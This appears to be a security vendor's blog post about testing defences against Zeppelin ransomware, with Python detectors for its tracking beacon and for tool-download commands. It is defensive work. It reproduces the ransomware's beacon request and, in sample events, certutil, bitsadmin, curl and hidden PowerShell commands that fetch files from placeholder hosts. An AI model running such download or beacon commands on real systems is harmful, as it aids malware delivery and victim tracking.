Attack Graph Response to US-CERT Alert (AA22-223A): Testing Security Controls against Zeppelin Ransomware 

AttackIQ’s Adversary Research Team has released a new assessment to test endpoint and network controls’ ability to prevent Zeppelin Ransomware.

On August 11, 2022, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) jointly released a Cybersecurity Advisory publishing indicators and behaviors observed in Zeppelin Ransomware attacks between 2019 and 2022. The release is a continuation of their #StopRansomware effort to inform defenders about ransomware variants and their threat actors.*

Zeppelin Ransomware is an evolution of the Vega and Buran Ransomware as a Service (RaaS) malware families. The ransomware has been adopted by many different malicious actors and has been observed broadly targeting organizations in the defense, education, manufacturing, and healthcare sectors. Initial access is typically achieved by these groups through spearphishing and the exploitation of common vulnerabilities. Once access has been established, the Zeppelin Ransomware disables and deletes backups before encrypting the victim’s files. Some variants of the malware use legitimate third-party sites to discover the victim’s external IP addresses and track victim installs. 

AttackIQ has released a new assessment to help customers validate their security controls and their ability to defend against the delivery of this ransomware family.  

Ingress Tool Transfer (T1105) 

  • Download / Save 2019-11 Zeppelin Ransomware Sample 
  • Download / Save 2020-07 Zeppelin Ransomware Sample 
  • Download / Save 2021-08 Zeppelin Ransomware Sample 
  • Download / Save 2022-05 Zeppelin Ransomware Sample 

The assessment will first test the delivery of different variants of the Zeppelin Ransomware family using unique samples from throughout the malware family’s evolution. Each malware file is downloaded from an AttackIQ-controlled server into the host’s memory to first test network controls that inspect incoming file downloads. Finally, the endpoint controls are tested by saving the file from memory to disk to validate whether EDR or Antivirus solutions can prevent the file from being written. 

Web Service (T1102) 

  • GeoIpTool.com IP Address Lookup Web Request 
  • GeoDataTool.com IP Address Lookup Web Request 

The next series of tests emulate the behavior observed during the initial Zeppelin infection, where the malware makes web requests to a legitimate site to discover the external IP address of the victim and then registers with the threat actor. GeoDataTool.com is a legitimate web service that informs visitors of their external IP address and geolocation information. GeoIpTool.com was an older version of that site that now redirects to GeoDataTool.com and was hardcoded into older versions of Zeppelin. These scenarios test access to the legitimate site using both domains.   

One-Way Communication (T1102.003) 

  • Zeppelin Ransomware IPLogger.org Tracking Web Request 

The final test emulates the web connection request to another legitimate web service, IPLogger.org. The site allows users to create tracking short links that act as canary tokens. When a short link is accessed, the external IP address, User-Agent, and Referer field are recorded in a dashboard accessible by the link creator. Zeppelin Ransomware uses a hardcoded User-Agent of ZEPPELIN and places a unique tracking value in the Referer field. The actor can then access the dashboard and track their victims. This scenario emulates this behavior by attempting to request a safe IPLogger short link with the same Zeppelin User-Agent and unique tracking value. 

GET /<Short Link ID>.jpg HTTP/1.1 
Host: iplogger.org 
User-Agent: ZEPPELIN 
Referer: <Unique Tracking Value> 
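
To show how a defender can pick this beacon out of proxy logs or packet captures, here is an added Python example (not part of the original post or of AttackIQ’s assessment) that parses requests in the format shown above and flags the hardcoded User-Agent, extracting the Referer as a pivot value. The short link id and tracking value in the sample requests are constructed placeholders.

```python
ZEPPELIN_UA = "zeppelin"                 # hardcoded User-Agent, compared case-insensitively
TRACKING_LINK_HOSTS = {"iplogger.org"}   # canary-link service named in the advisory


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers).
    Header names are lower-cased so lookups do not depend on the client's casing."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def assess_request(raw):
    """Return a finding dict for requests that look like the Zeppelin beacon, else None.

    'high'  : the hardcoded ZEPPELIN User-Agent is present, whatever the host.
    'low'   : any other request to a tracking-link host; these sites also carry
              benign traffic, so this is a hunting lead rather than an alert.
    The Referer is surfaced as the tracking value so analysts can pivot on it."""
    _method, path, headers = parse_http_request(raw)
    host = headers.get("host", "").lower()
    finding = {"host": host, "path": path, "tracking_value": headers.get("referer")}
    if headers.get("user-agent", "").lower() == ZEPPELIN_UA:
        return {"severity": "high", **finding}
    if host in TRACKING_LINK_HOSTS:
        return {"severity": "low", **finding}
    return None


# Constructed sample requests; the short-link id and tracking value are placeholders.
ZEPPELIN_REQUEST = ("GET /AbCd123.jpg HTTP/1.1\r\nHost: iplogger.org\r\n"
                    "User-Agent: ZEPPELIN\r\nReferer: TRACKING-VALUE-PLACEHOLDER\r\n\r\n")
BROWSER_REQUEST = ("GET / HTTP/1.1\r\nHost: iplogger.org\r\n"
                   "User-Agent: Mozilla/5.0 (constructed)\r\n\r\n")
BENIGN_REQUEST = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                  "User-Agent: Mozilla/5.0 (constructed)\r\n\r\n")

if __name__ == "__main__":
    for req in (ZEPPELIN_REQUEST, BROWSER_REQUEST, BENIGN_REQUEST):
        print(assess_request(req))
```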

Additional Emulation Considerations 

Earlier this year, AttackIQ released a full-featured attack graph that emulated the tactics, techniques, and procedures (TTPs) used by the Conti Ransomware Group. While Zeppelin Ransomware was not used by that actor, many of the techniques used by Conti are also used by the threat actors that deploy other Ransomware-as-a-Service offerings. The AttackIQ Adversary Research Team believes that, given its comprehensiveness, the Conti Ransomware Team attack graph is an ideal choice for validating a customer’s security controls against a Zeppelin ransomware attack at this time.  

Detection Opportunities 

Once a malicious actor has compromised an endpoint, they may attempt to transfer any tools or malware onto the device. Attackers may utilize tools such as PowerShell, Certutil, Bitsadmin, and Curl.  

PowerShell Example: 
Process Name == (Cmd.exe OR Powershell.exe)  
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest”) AND “DownloadData” AND “Hidden”)  

Certutil Example: 
Process Name == Certutil.exe  
Command Line CONTAINS (“-urlcache” AND “-f”)  

Bitsadmin Example: 
Process Name == Bitsadmin.exe  
Command Line CONTAINS (“/transfer” AND “http”)  

Curl Example: 
Process Name == Curl.exe  
Command Line CONTAINS (“http” AND “-o”)  
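
The four pseudo-rules above, implemented as an added Python example (not AttackIQ’s code) and run over constructed process-creation events. Image paths, URLs and file names in the samples are placeholders; the last sample is a hidden Invoke-WebRequest download that lacks the DownloadData term and so shows where the PowerShell rule, as written, stops.

```python
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    process_name: str  # image name or full path, as logged by the EDR / Sysmon
    command_line: str


# Rules transcribed from the post: the process name must match and every
# term group must have at least one member present in the command line.
RULES = [
    ("PowerShell", {"cmd.exe", "powershell.exe"},
     [("iwr", "invoke-webrequest"), ("downloaddata",), ("hidden",)]),
    ("Certutil", {"certutil.exe"}, [("-urlcache",), ("-f",)]),
    ("Bitsadmin", {"bitsadmin.exe"}, [("/transfer",), ("http",)]),
    ("Curl", {"curl.exe"}, [("http",), ("-o",)]),
]


def match_rules(event):
    """Labels of every rule the event satisfies. Matching is case-insensitive
    substring matching, as the pseudo-rules imply; a full image path is reduced
    to its file name first so "C:\\...\\certutil.exe" still matches."""
    name = event.process_name.lower().replace("/", "\\").rsplit("\\", 1)[-1]
    cmd = event.command_line.lower()
    return [label for label, names, groups in RULES
            if name in names and all(any(t in cmd for t in g) for g in groups)]


def scan(events):
    """Map event index -> triggered rule labels; events with no hits are omitted."""
    return {i: hits for i, ev in enumerate(events) if (hits := match_rules(ev))}


# Constructed process-creation events (not real telemetry); URLs are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -WindowStyle Hidden -Command \"$wc = New-Object Net.WebClient; "
                 "$b = $wc.DownloadData('http://placeholder.invalid/z'); IWR http://placeholder.invalid/ack\""),
    ProcessEvent("certutil.exe", "certutil.exe -urlcache -split -f http://placeholder.invalid/z.exe z.exe"),
    ProcessEvent("bitsadmin.exe", "bitsadmin.exe /transfer j /download /priority high "
                 "http://placeholder.invalid/z.exe C:\\Users\\Public\\z.exe"),
    ProcessEvent("curl.exe", "curl.exe -s http://placeholder.invalid/z.exe -o z.exe"),
    ProcessEvent("certutil.exe", "certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256"),  # benign use
    ProcessEvent("powershell.exe", "powershell.exe -w Hidden -c \"IWR http://placeholder.invalid/z -OutFile z.exe\""),  # no DownloadData term
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))  # events 4 and 5 produce no hits
```

Because every term is a plain substring, the “-f” and “-o” terms are deliberately broad; tune the term groups to the telemetry you actually collect before deploying these as alerts.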

Conclusion 

Ransomware-as-a-Service is prolific, and this new assessment will help customers validate their security controls against the Zeppelin Ransomware threat and the many actors conducting the attacks by focusing on the malware itself and the network discovery actions it takes. AttackIQ stands at the ready to help security teams implement this attack graph and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard. 


*We briefly debated an alternate title for this blog: “Get the Led Out”